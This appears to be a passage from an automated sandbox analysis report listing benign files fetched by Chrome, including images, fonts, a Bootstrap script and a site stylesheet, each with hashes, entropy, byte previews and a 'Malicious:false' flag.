                                              SHA-256:CA16AD988BF26AC254415896E15B39D56EB886830373FA46A1FCFC200A7FC59E
                                              SHA-512:642D6FC3D4B5E58F5CBB8342353733A5838A374C6A24F984122CFA70F507C3C8854D39B9495AFA5828C0F3880C591531B59165CC6C14253061DEF6E99B73D172
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...AiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.0 (20230801.m.2265 3a00623) (Windows)" xmpMM:InstanceID="xmp.iid:922B77E2352611EEBA79C9597ACFE4BC" xmpMM:DocumentID="xmp.did:922B77E3352611EEBA79C9597ACFE4BC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:922B77E0352611EEBA79C9597ACFE4BC" stRef:documentID="xmp.did:922B77E1352611EEBA79C9597ACFE4BC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.$......IDATx..]..VS.?...P..B3Y...B..+kh..${..%.F#..T.... m.......G...d}O........v..s
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6064
                                              Entropy (8bit):7.202838326829713
                                              Encrypted:false
                                              SSDEEP:96:nRBf33PRsfh303KwnbYlNY54glWxDYnS3hkA6UhrqWVgskzs1YxcbwadujDu9lka:RBigX6px8nSRkjebgN/xELI4P
                                              MD5:549D0830DA4A9DC0E04608256EEDB6F9
                                              SHA1:7EADCC0EA7C47A6CEB6AADBA68E335FA24CD42A9
                                              SHA-256:D12AC1B6F0BA3FF4C62816B4EAE02BD6FDC19D121DCE9D0197B63303C8D088BC
                                              SHA-512:12B7F5D3CF982108F49F646759BF159883B530A2212E56AED2D14CD771B3D893C161B4742A7735B8E81FE23A40BD76FE3FC66080F59FEB43A39C3142F5B458DD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/android.png
                                              Preview:.PNG........IHDR..............$.....sBIT.....O.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....PLTE.....d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..d..dx......tRNS................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUXZ[\]^_`abcdfhijklmnopqrstuvxyz{|}~...............
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):13786
                                              Entropy (8bit):7.621431631137947
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwdfjUR6hoapuSNfsJcqlRPvfFLo6z569X8iZpyvq:4YNg71U6tN6lBfm6zS86pyvq
                                              MD5:445BBB116A232AD47817E0D38C2A9EB1
                                              SHA1:7D32F1381838F43FC27404803A8A8D1A33A00D75
                                              SHA-256:1A86CF1CBFBB3046CF529A6E42A6EECB55E9114322A69B6C9B1220A0B75F97BA
                                              SHA-512:15AC5695B38054F5288C3F4EAA833405904E537DDD9F5B17794C8CD2F977B6BBDAA9340C780E8A1F9A2C9483FEC231BC9F5373CFB5001204459988402F422EF3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/41/9a425284a8782bb86f821fa481605497.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):19735
                                              Entropy (8bit):7.7739521697401965
                                              Encrypted:false
                                              SSDEEP:384:HdAe/8EYhDj9hpswD3gg8gnL+lm6I1oyJc3BOsgom2bLgMwjAX7HN:HhoCM3dnL+gv1oyC3csgXtijN
                                              MD5:2B52629F09A3CE0A914769B1189D0CA6
                                              SHA1:2652F87377EBCDB23D7781A1F26F269E5E8632E4
                                              SHA-256:FD5F5697BE99E813C5114BDAA83BAA97527DC952A412A1F3271B1D7F66DE130C
                                              SHA-512:3E9A41A13CB0D982EDA96F7B10509759EBD0D487B2545FBD53E1E6D8B51F3DACF552690C55B1B9AFF8219DB0BF63BB175E95388C6978A4DC88D7AC43DA07B79E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/4/ed0c80b1db009dd23b3c0d61985ff1a0.jpg
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:1055E192925F11ED8BCBBDE1C3CD0FA7" xmpMM:DocumentID="xmp.did:1055E193925F11ED8BCBBDE1C3CD0FA7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1055E190925F11ED8BCBBDE1C3CD0FA7" stRef:documentID="xmp.did:1055E191925F11ED8BCBBDE1C3CD0FA7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................i..-...<...M.................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65299)
                                              Category:dropped
                                              Size (bytes):78129
                                              Entropy (8bit):5.197397473920562
                                              Encrypted:false
                                              SSDEEP:1536:pppbTNR2t4NEdiK5J2w8gGzjJVPOW7tI+r9ixR2nwZY:T36WJr9ixi
                                              MD5:7CCD9D390D31AF98110F74F842EA9B32
                                              SHA1:A85E681624C91A106A514C31EACF80DE817B2CC3
                                              SHA-256:F5210FA3E7F0245A4C51EB7F280092C0EF99FDD28C45E17DAB8CC5854FDF4FD3
                                              SHA-512:A5AC783258178C710F7C2C1C24B4218A063BF8DF2BB7A6D5BD62C5C9432EC5286FD7BD17E774D1CC63E63E4666181864FA38A447C581338CA5EC0F563071EABE
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*!. * Bootstrap v5.1.3 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t="transitionend",e=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i=`#${i.split("#")[1]}`),e=i&&"#"!==i?i.trim():null}return e},i=t=>{const i=e(t);return i&&document.querySelector(i)?i:null},n=t=>{const i=e(t);return i?document.querySelector(i):null},s=e=>{e.dispatchEvent(new Event(t))},o=t=>!(!t||"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),r=t=>o(t)?t.jquer
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):97809
                                              Entropy (8bit):5.05893713601857
                                              Encrypted:false
                                              SSDEEP:1536:qsjtxFGQaykfVQybYkcy/2MylUuIZCUymcdH:hxYykfVQybYkcbeCUymWH
                                              MD5:C572E3988BA111ADAB5588A643E67A1D
                                              SHA1:E3243417C8780B500DB8E76999C6B8326A4A619D
                                              SHA-256:C478065044D03DC608EFFFA5A2BD0C6636B8180E2ECF79A8ED6AC104478C9CEA
                                              SHA-512:5940A1E5CD4693F04FCFBAEF0E514B3FBC2589729B31ADE8E69C5F5BA7CBB60C78E95B70B587E126F14F89CA1655846B0C286CE57D32797E89E91BD337E677AA
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/css/style.css
                                              Preview:@charset "utf-8";../*======================================....../*-------------Import fonts ---------------------------------------*/..@import url('https://fonts.googleapis.com/css?family=Montserrat:400,500,600,700,800,900|Poppins:400,600,700|Questrial&subset=devanagari,latin-ext,vietnamese');..../*-------------General Style---------------------------------------*/..html {...overflow-x: hidden !important;...height: 100%;..}....body {...margin: 0;...padding: 0;...font-weight: 400;...font-size: 12px;...height: 100%;...text-align: center;...background: #f4f4f4;...color: #000;...font-family: 'Sora-Medium' !important;....}....@-o-viewport {...width: device-width;..}....@-ms-viewport {...width: device-width;..}....@viewport {...width: device-width;..}.....bg-black{...background-color: #000;..}..../* ---------Page preload--------------------------------------*/...loader {...position: fixed;...top: 0;...left: 0;...width: 100%;...height: 100%;...background: #fff;...z-index: 100;..}....#movingB
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):25797
                                              Entropy (8bit):7.832766452790604
                                              Encrypted:false
                                              SSDEEP:384:Z0VInDOAKKifMmvaeptPRUN50UcXvXPwPasf9bXV7zCrLs3O1BYPJIDbp:tnSAOpaGUeXPwPaI9bl7zx/a
                                              MD5:60C29334D071060CF624D1EDC6DE2FA5
                                              SHA1:4FC195BDBC96F90D692515B55396B6739B1934CC
                                              SHA-256:9BF922A78CE5CD210980F7E120599C750EE1E25A6FC2EEDFD682DEC2CF20C222
                                              SHA-512:E7994EC6FBD9DDF5C615C899BBB3351A4773293C7603E7C60EF013920EE76369BC70168E3A408031B70A444B23E3D3123D4CE1840D72448E411F95979C0F2CBB
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:D3D5F94E933011EDB1FDD27771EBA6AE" xmpMM:DocumentID="xmp.did:D3D5F94F933011EDB1FDD27771EBA6AE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D3D5F94C933011EDB1FDD27771EBA6AE" stRef:documentID="xmp.did:D3D5F94D933011EDB1FDD27771EBA6AE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................6...KH..d.................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 640x828, components 3
                                              Category:dropped
                                              Size (bytes):45790
                                              Entropy (8bit):7.901802095450207
                                              Encrypted:false
                                              SSDEEP:768:VAgsqdoZqRwJicgXF4okHPBaAP+ENKGAIigacH+DKaL+0npBP:VAmo5aV4okYAPbK3oaE+DVL+qB
                                              MD5:BC242FE53AD46DA8C738EAA89E5954DF
                                              SHA1:FBBD503EB6713289C15B5586B6A8CCE527EE55DD
                                              SHA-256:E88F3B3D826DDC03E8CD69082C028366277DCD045BADF073996B603B95750889
                                              SHA-512:9D82BE5E31D178169F251067128DA7BB08CAC1385DAD8C280118EF58250B125711F89AE4D873FAEE44EBF86051BD9B1C1F9D753867F4CF2FA5D8F05237E436FD
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:AC3E76A1930B11ED8DEF92E1224A4ED7" xmpMM:DocumentID="xmp.did:AC3E76A2930B11ED8DEF92E1224A4ED7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AC3E769F930B11ED8DEF92E1224A4ED7" stRef:documentID="xmp.did:AC3E76A0930B11ED8DEF92E1224A4ED7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................'..'2&.&2.&&&&.>55555>DAAAAAADDDDDDDDDDDDDDDDDDDDDDDDDDDDD.... . &..&6& &6D6++6DDDB5BDDDDDDDDDDDDDDDDDDDDDDDD
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):10840
                                              Entropy (8bit):7.50003359940106
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw3y+/T9ySaAk/Vm4ACI50RhfOZjjjjjjjjjjjjjjjhhH2RjU8Fy:4YNg7C+5ySaAuVCGWZjjjjjjjjjjjjjn
                                              MD5:1052C9707F62E4FFADE95C710A9221DA
                                              SHA1:2966DDE136E8F92991D042D61B477D0DB9576862
                                              SHA-256:7EAFCC4A4356DAA707823EE12A99AE8C09F4CBD8CF8D80435193494DC900B6EA
                                              SHA-512:81105B87ACC9C3B7F128CCCEAC1BEE21531F7E351794F38467A2848C1D605623D289DB86C48A47E3349D0EE44C99D2D4EBE46795796F8A1FDD4365E1F233162A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5740
                                              Entropy (8bit):7.861649808886073
                                              Encrypted:false
                                              SSDEEP:96:SllcHitlIxv9vk7C1+I4wWHLihk/xo9ydQB/BloZZZZCXXw9yzXTDCeugj:ZIIHUCD4waSk9hPa
                                              MD5:67CA02552FFD5B3BDA9A1ACA7E285324
                                              SHA1:0161CE177F8F6058A621B1D9447211359544E877
                                              SHA-256:9F74A4CA9F5C808B7E0F8639A80218F303446B719B5F33B8410F6E6E2AAD9381
                                              SHA-512:FB15D1F7C25B54164BD10C60210F33EEED097D37A8F5AEBC8FF217D2063388BE7FFEFF85B46F35C5648283C54874EAC44583FA4A639974BF0AD1A9458D9C3ED9
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/cfmoto.png
                                              Preview:.PNG........IHDR.......P......N.....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):9514
                                              Entropy (8bit):7.407492448943884
                                              Encrypted:false
                                              SSDEEP:96:pN26MT0D5MdtbZPAVwzVdz8PJ4Sf8tousplQvlCob9t9AIetlRorWyadTJOhpb:4YNMtKwEyozlylDzmtUCwPb
                                              MD5:229C37389E0E8EBF52EFFF5FD5AF2F4B
                                              SHA1:07D3B0D68DBAD5536251266DC26CA8F4173C93A0
                                              SHA-256:B529F1C84C2159CE9329785267C372B5802736AA0E4C5A85CCD1406565FBF96E
                                              SHA-512:2915CB1DB6BD408EAFCAB8BAE500E2033419A65D4F6807A96CC99D86D2DB6D656F11D8B6C341131C84691CAC23B3E67CE9F3851308CB8EAC7E219E245821230E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):12702
                                              Entropy (8bit):7.976867931273701
                                              Encrypted:false
                                              SSDEEP:384:ZOHnGIpzhlsCuMlp0MPe7qDPRG9ZEZ/SyV:gnFzhKcpbPqqDaEZKI
                                              MD5:FB7E6B7192944B7AD6D8E6FE39760073
                                              SHA1:CAB9496110D35F94270E86FF2149877AD95F6CC4
                                              SHA-256:F44417781200FD5BF70BA6C1FB6B08F78D9286A6DDC50AD72DD69FDEFC82B1A0
                                              SHA-512:E5874C5635B3CD82DAD7E90802F6297B5BAAE3102C12455390732DE917940661713BE6B9AAD873C28F910EEC3A774AF152EE0CA169B41B31E1A5B76F8A84DE98
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.1..WEBPVP8L.1../..?...$E..-..k=8_....8..}....@.`w.......p..R.wq. .../."j t.zm..&i...b....bE .........7....T.q.1J......!6H.. ..?..f.0+.T...4...6.C..p.>.......gv.(..r2sZ.po..].f.#=#..r.r.r.t.i!.9..G..@4....y.D..@4....G4.#.7.3+.r....9..F..n%.J..if....3.k>/8...$9.l[G..lT.E!...Z>.`c...R...p...............;.m..N.AD.E_.....lt..."..6,..d....y..;....j..UU..>0........"..CP\0d..Y2..}....(.x...2.c.|q..m.f...5..AXe.9?...'._..../W...q.>x>......{N....z.~]r.A....=-.k.../?...4..B-%M..?R.p=;...........l*../......Yq.............a..8..Z......?f..~....O...pu>=...WL..}.>...wD..c,........h,.#...%,1\k.o.~q8..z.............Vk~.e....|R....C<c...WL,G....P...Y......nYi.....*U@B..0..P.YH.U .......+|b7....<..........$*{......R....T ..W...pq..:q......~.5*..=.j2.8.~s..._..~.R.K.G.*@..7H...j#.k..=V!+n..:.k.....`.3...$........r..u6....bv.<.....9..~..*.g....E......4..Fw.....l.*..tD..l........[...&..Y3...Y.t...$_x....SZ.n..{.~y..'.C..K1zV>.."&l..w...W..v..R..O|....{.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                              Category:downloaded
                                              Size (bytes):15344
                                              Entropy (8bit):7.984625225844861
                                              Encrypted:false
                                              SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                              MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                              SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                              SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                              SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                              Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:dropped
                                              Size (bytes):89632
                                              Entropy (8bit):7.969434539089286
                                              Encrypted:false
                                              SSDEEP:1536:P6eni2f67266l+UGrf6kNXNfgcfRbq9DpWEBoVDkwP8kamE2nwxF+JUei:PjiMAbu+UGeklN7fRbqRUuoVDrZ42nwB
                                              MD5:A843DE85098B94B4831BB3DDD9DEF238
                                              SHA1:0E04E5AE42E6EECA7912E47AE6170E40749DF129
                                              SHA-256:AE6D3BA29CCFFEAD6B5E634A00AFB83B1DB01E96E29B90AAF2A693AC64B51EBB
                                              SHA-512:936DC293D2A4BE8655231DD4265FE3979CC10EA8CD0694D7346F7126A89157F456811BE530F0691902657C022C86EB3147891782320868A4DD01369749E3E8A3
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:3A43EAB0934211EDAE26F75319497C35" xmpMM:DocumentID="xmp.did:3A43EAB1934211EDAE26F75319497C35"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3A43EAAE934211EDAE26F75319497C35" stRef:documentID="xmp.did:3A43EAAF934211EDAE26F75319497C35"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............C....<..^...........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):12270
                                              Entropy (8bit):7.5678008595780835
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwT0M0LA5q1sO2Q3K98RjKOA2o49yY5lbbc89XydwU7vNr:4YNg7TV5Gvj6CI2yYPbfCDNr
                                              MD5:97DFEAE3F508B2F38E0669E00A951FB2
                                              SHA1:D5BAFA432BB14E0851DF3D1490E40ACC61451AA9
                                              SHA-256:7185FA419035D0132F2FDEC19C1A3F90D0643D412AD4461424557C582BCB852F
                                              SHA-512:D093B3389D0C954E1B16043446C8A9AECF90AE1FCD7D20558C471590684E639EF2753F0DFEA9E7EE31D705B67E09E66F34A4B01DAF72CD88B5E502AC0A85E62E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/33/0f5b264ba5b09d2caab11ebfa7642d75.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):47858
                                              Entropy (8bit):7.9952926302069764
                                              Encrypted:true
